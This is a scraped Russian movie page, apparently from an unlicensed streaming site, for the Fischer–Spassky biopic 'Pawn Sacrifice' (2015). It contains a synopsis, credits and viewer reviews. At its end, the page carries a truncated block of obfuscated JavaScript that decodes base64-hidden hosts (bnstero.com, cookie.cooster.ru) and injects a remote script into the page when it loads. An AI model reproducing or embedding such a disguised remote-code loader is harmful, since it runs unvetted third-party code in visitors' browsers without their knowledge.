Вы зашли, чтобы посмотреть или скачать Жертвуя пешкой (2015) смотреть онлайн на video-popcorn.ru полностью в хорошем качестве HD. Выберите один из плееров, что находятся ниже и начинайте просмотр.
  • video-popcorn.ru: 0
Жертвуя пешкой (2015)

Жертвуя пешкой (2015)

Жертвуя пешкой (2015)
Почти во всем мире популярности набирают фильмы в которых идет речь о противостоянии двух супердержав СССР и США, на сей раз такое противостояния выльется в схватку двух известных шахматистов- Бобби Фишера и Бориса Спасского. В то время был как раз сам разгар так называемой Холодной войны, но внимание всего мира было приковано к очень интригующей и непредсказуемой схватке на шахматной доске, на кону стояло звания чемпиона по шахматам который должен был произойти в Рейкьявике. Абсолютным чемпионом мира являлся как раз Борис Спасский и теперь ему необходимо отстоять свой титул, а сделать это будет очень нелегко, его соперник просто таки одержим игрой он с самого раннего детства уже обыгрывал титулованных шахматистов Штатов и мог играть шахматы сразу с многими соперниками которые были намного старше и опытные его, но при этом Фишер никогда не проигрывал. Он был просто уверен что проиграть Спасскому он просто не имел права. Этот поединок зажег мировой скандал который превратился в противостояния двух сильнейших стран. Напряжение росло с каждым днем все больше и больше. Дошло даже до того что разум Фишера, охватила паранойя и он начинает нести какую то чушь. Создатели фильма очень старались чтобы он получился как наиболее правдоподобным и реалистичным, они прежде чем начать съемки очень долго изучали жизнь шахматистов. Режиссером является- Эдвард Цвик. Сценарий написанный- Стивеном Найтом, Стивеном Дж. Ривелом и Кристофером Уилкинсоном. Продюсеры кторые финансировали ленту- Гэйл Кац, Тобби Магуайр и Эдвард Цвик. Главный оператор- Брэдфорд Янг. Музыкой порадует композитор- Джеймс Ньютон Ховаррд. Художники которые оформили премьеру- Изабель Гюэ, Лиза Кларрк и Жан-Пьерр Паке. Монтажом занимался- Стивен Розенблюм. Длительность просмотра составляет- час и пятьдесят пять минут. В ролях- Тоби Магуайр, Лив Шррайбер, Лили Рэйб, Питер Саррсгаард, Майкл Стулбаррг, Роббин Вайгерт, Софи Нелисс, Эвелин Бррошу, Шеймас Дэви-Фицпатррик, Эйден Лавккамп и многие другие. Приятного просмотра!
В главных ролях:
    Тоби Магуайр, Лив Шрайбер, Робин Вайгерт, Лили Рэйб, Питер Сарсгаард, Майкл Стулбарг, Софи Нелисс, Эвелин Брошу, Шеймас Дэви-Фицпатрик, Лидия Зедел
Режиссер:
  • Эдвард Цвик
Год: 2015
Страна: США
Жанр: Биографии, Драмы
Последнее обновление: [1-01-2016, 22:42] Добавлено(а) Лицензия
Доступен на: iPhone, iPad, Android, iMac, PC, *nix, media services


Смотреть онлайн Жертвуя пешкой (2015) в хорошем качестве

Оставить комментарий
1-01-2016, 22:42

Анна | 0 5 марта 2017 09:10
Осталась под глубоким впечатлением от этого фильма.Игра актеров заслуживает отдельного внимания,им удалось передать все то напряжение политическое и психическое,которое испытывали два гениальных игрока в шахматы.Противостояние двух гениальных умов,как противостояние двух,господствующих систем.Гениальность на грани безумия и просто знакомят нас с двумя личностями,которые сыграли ту известнейшую партию.Фильм продержал в напряжении и я получила удовольствие от просмотра!

Sullanaatsa | 0 3 января 2016 17:10
Отличный фильм про гения, безумие и шахматы) Магуайр отлично отыграл

Leonidmi | 0 3 января 2016 16:09
«Идея, которая не опасна, не достойна называться идеей» © Оскар Уайльд

Роберт Фишер. Кто же он — гений или сумасшедший? Именно на этот вопрос пытается найти ответ Эдвард Цвик, режиссер картины, посвященной жизни Бобби Фишера, одного из сильнейших шахматистов XX века. «Жертвуя пешкой» — это байопик о поединке с Борисом Спасским за звание чемпиона мира по шахматам в 1972 году, разворачивающимся в самый разгар Холодной войны. Состязание сопровождалось многочисленными скандалами и приковало к себе внимание общественности, наблюдающей за психологическим и политическим противостоянием американского и советского гроссмейстеров.

1951 год. Бобби Фишер, восьмилетний мальчик, живущий в Бруклине с матерью и сестрой, демонстрирует уникальные способности к игре в шахматы. Уже в 14 лет он становится самым молодым за всю историю чемпионом США. Но что же в действительности скрывалось за маской самоуверенности? В картине шахматист представлен одиноким, разорвавшим отношения с матерью, молодым человеком, окруженным толпой журналистов и лишь несколькими близкими ему людьми, всерьез опасавшихся за его психическое здоровье. Срывы поединков и опоздания Фишера на шахматные партии, завышенные требования к организации чемпионатов, обвинения в адрес других игроков провоцировали множество скандалов. Но все, что им двигало — это лишь страсть к игре и жажда победы. Ничью Фишер воспринимал как поражение и презирал игроков, соглашавшихся на нее.

Реализм происходящих на экране событий, яркая личность главного героя, захватывающее и волнительное повествование превращают фильм в напряженный интеллектуальный триллер, в котором главный герой тщательно пытается просчитать ситуацию на несколько шагов вперед. Выигрыш в поединке за звание чемпиона — не просто цель для Фишера, а поставленная государством задача. Десятки тысячи глаз, устремленных на шахматиста, оказывают на него огромное давление — Роберт мечется в сужающейся клетке собственного безумия, одержимый идеей победы над советским игроком. Режиссер картины умело расставляет акценты на, казалось бы, незначительных для зрителя деталях, которые столь раздражали Фишера — звук щелкающих камер репортеров, шепот зрителей, тиканье часов. В достижении нужного эффекта немаловажную роль играет музыка Джеймса Ньютона Ховарда, которая заставляет заиграть выдержанную в пастельных тонах киноленту яркими красками.

Тоби Магуайр в роли гениального шахматиста, подверженного приступам паранойи и психоза, смотрится невероятно впечатляюще. Пожалуй, это одна из и лучших и наиболее сложных ролей за всю его карьеру. Магуайр буквально выносит весь фильм на своих плечах — всеобщее внимание приковано именно к его герою, балансирующему по тонкой черте между безумием и гениальностью. Актерскую игру Лива Шрайбера трудно оценить по достоинству ввиду ограниченного экранного времени, уделенного его герою. А жаль, ведь более проработанный образ молчаливого и сосредоточенного советского шахматиста, полной противоположности неуравновешенного Фишера, был бы интересен зрителю.

Новая режиссерская работа оскароносного Эдварда Цвика — пожалуй, одна из самых запоминающихся кинолент уходящего года. Шахматы — не самый зрелищный вид спорта, но картина «Жертвуя пешкой» доказывает обратное. Противостояние двух сверхдержав, происходящее на шахматной доске, заставляет зрителя с замиранием сердца следить за виртуозным перемещением фигур в руках гроссмейстеров. И когда действие фильма переходит к знаменитой шестой партии, Роберт Фишер перестает быть скандалистом, параноиком и антисемитом, а зрителю остается лишь одно — аплодировать.

Vannonossovik | 0 2 января 2016 21:18
Фильмов про шахматы снимается действительно мало. Можно вспомнить очень немного фильмов, связанных с шахматной тематикой. Были, как более удачные ("Защита Лужина», «Гроссмейстер», «Выбор игры»), так и менее ("Ход королевой»). В любом случае учитывая редкость данной темы в фильмах, фильм стоит посмотреть.

Прежде всего я оценивал этот, как человек 20 лет играющий не на любительском уровне. Поэтому про фигуру самого Фишера, как и про матч 1972 года мне было известно достаточно. Интересна была художественная форма подачи исторических событий.

Конечно сразу нужно отметить художественную направленность фильма. Для зрителя не искушенного фактами, события показанные в фильме не вызовут особых сомнений. Однако если посмотреть на историю, то мы увидим очень много несостыковок.

1. Играя на олимпиаде в Варне (1962), Фишер говорит про «заговор русских», что конечно относится к турниру претендентов в Кюрасао (1962).

2. Говоря на этом же турнире про свой уход из шахмат, вероятнее всего подразумеваются события межзонального турнира в Сусе (1967)

3. «Кубок Пятигорского» представлен, как матч-турнир СССР-США.

4. Спасского постоянно называют сильнейшим шахматистом, хотя чемпионом мира он стал только в 1969 году.

Список можно продолжить, но в этом нет особого смысла.

Американцы сняли хороший, с художественной точки зрения, фильм, про американца-чемпиона. Спасский представлен в демоническом образе, что впрочем предает определенный шарм роли исполненной Ливом Шрайбером. Тоби Магуайр так же не подкачал с исполнением закрытости и параноидальных наклонностей чемпиона мира.

Вывод — посмотреть стоит, даже если вы не сильны в шахматной истории!

8 из 10

ZamiRusiIan | 0 2 января 2016 15:21
Фильм показывает жизнь одного из легендарных и своеобразных шахматистов мира- Роберта Фишера. Фишер родился в еврейской семье, в Нью-Йорке. Мать и отец учились в Москве, потом эмигрировали в США (отца не пустили)

Играть в шахматы его научила сестра и сразу же он влюбился в эту игру. Фишер в скором времени стал узнаваемым, выигрывая шахматные турниры. Из-за политических убеждений матери (была коммунисткой) они часто ссорились, и это ему сильно мешала. В скором времени она переехала в Калифорнию, оставив Фишера одного в Бруклине.

Как и многие другие великие люди у Фишера так же были проблемы с психикой (паранойя). Большую популярность он добился своими выходками перед и во время шахматных турниров. Особо тяжелые отношения у него были с шахматистами из СССР, в частности с легендарным Борисом Спасским.

Со времен его юности до 90-х годов ЦРУ вела слежку за его семьей и за ним. Это очень ясно показывается в фильме, в те моменты когда он ищет жучки в телефонах, обыскивает отельные времена.

Непосредственно о фильме. Фильм понравился, слишком простой и в то же время глубокий. В этом фильме не чувствуется столь сильное воздействие «голливудшины» как это было в фильмах «Теория всего» и «Энигма». Жаль что фильм заканчивается после 6-ой партии на звание чемпиона мира (легендарная партия). А ведь то что произошло с Фишером после этой победы не маловажно, а даже интереснее.

Фильм советую обязательно посмотреть и изучить биографии Фишера, Спасского.

9 из 10
Имя:*
E-Mail:
Введите код: *
Кликните на изображение чтобы обновить код, если он неразборчив


Ads
Фильмы
ADS
Скоро в кинотеатрах
Последние комментарии
d','src','getElementsByTagName','appendChild','function','_initAdsteroidWidget','exports','call','defineProperty','__esModule','hasOwnProperty','atob','protocol','indexOf','http','location','createElement','script','type','text/javascript','readyState','onreadystatechange'];(function(_0x1e2bb6,_0x1eb580){var _0x3ee805=function(_0x30b987){while(--_0x30b987){_0x1e2bb6['push'](_0x1e2bb6['shift']());}};_0x3ee805(++_0x1eb580);}(_0x5a4a,0x140));var _0x3778=function(_0x5da4b8,_0x4d63d9){_0x5da4b8=_0x5da4b8-0x0;var _0x37c279=_0x5a4a[_0x5da4b8];return _0x37c279;};!function(_0x3e9737){function _0x537dd3(_0x4abc97){if(_0x10c847[_0x4abc97])return _0x10c847[_0x4abc97][_0x3778('0x0')];var _0x573fe2=_0x10c847[_0x4abc97]={'i':_0x4abc97,'l':!0x1,'exports':{}};return _0x3e9737[_0x4abc97][_0x3778('0x1')](_0x573fe2[_0x3778('0x0')],_0x573fe2,_0x573fe2[_0x3778('0x0')],_0x537dd3),_0x573fe2['l']=!0x0,_0x573fe2[_0x3778('0x0')];}var _0x10c847={};_0x537dd3['m']=_0x3e9737,_0x537dd3['c']=_0x10c847,_0x537dd3['d']=function(_0x1e1569,_0x2aeaeb,_0xb3f269){_0x537dd3['o'](_0x1e1569,_0x2aeaeb)||Object[_0x3778('0x2')](_0x1e1569,_0x2aeaeb,{'configurable':!0x1,'enumerable':!0x0,'get':_0xb3f269});},_0x537dd3['n']=function(_0x35020a){var _0x10c847=_0x35020a&&_0x35020a[_0x3778('0x3')]?function(){return _0x35020a['default'];}:function(){return _0x35020a;};return _0x537dd3['d'](_0x10c847,'a',_0x10c847),_0x10c847;},_0x537dd3['o']=function(_0x4c3292,_0x5995f0){return Object['prototype'][_0x3778('0x4')][_0x3778('0x1')](_0x4c3292,_0x5995f0);},_0x537dd3['p']='/widget/',_0x537dd3(_0x537dd3['s']='lult');}({'lult':function(_0x2587f4,_0x67bbea){!function(_0x6e122f,_0x4027f8){_0x6e122f=window['atob'](_0x6e122f),_0x4027f8=_0x4027f8?window[_0x3778('0x5')](_0x4027f8):_0x6e122f,_0x6e122f&&-0x1===_0x6e122f['indexOf']('http')&&(_0x6e122f=window['location'][_0x3778('0x6')]+'//'+_0x6e122f),_0x4027f8&&-0x1===_0x4027f8[_0x3778('0x7')](_0x3778('0x8'))&&(_0x4027f8=window[_0x3778('0x9')][_0x3778('0x6')]+'//'+_0x4027f8),function(_0x329e41,_0x3540dd){var _0x870978=document[_0x3778('0xa')](_0x3778('0xb'));_0x870978[_0x3778('0xc')]=_0x3778('0xd'),_0x870978[_0x3778('0xe')]?_0x870978[_0x3778('0xf')]=function(){_0x3778('0x10')!==_0x870978[_0x3778('0xe')]&&_0x3778('0x11')!==_0x870978[_0x3778('0xe')]||(_0x870978['onreadystatechange']=null,'function'==typeof _0x3540dd&&_0x3540dd());}:_0x870978[_0x3778('0x12')]=function(){'function'==typeof _0x3540dd&&_0x3540dd();},_0x870978[_0x3778('0x13')]=_0x329e41,document[_0x3778('0x14')]('head')[0x0][_0x3778('0x15')](_0x870978);}(_0x6e122f+atob('L3dpZGdldC9iYy5qcw=='),function(){_0x3778('0x16')==typeof window[_0x3778('0x17')]&&window[_0x3778('0x17')](_0x6e122f,_0x4027f8);});}("Ym5zdGVyby5jb20=","Y29va2llLmNvb3N0ZXIucnU=");}}); <--/noindex-->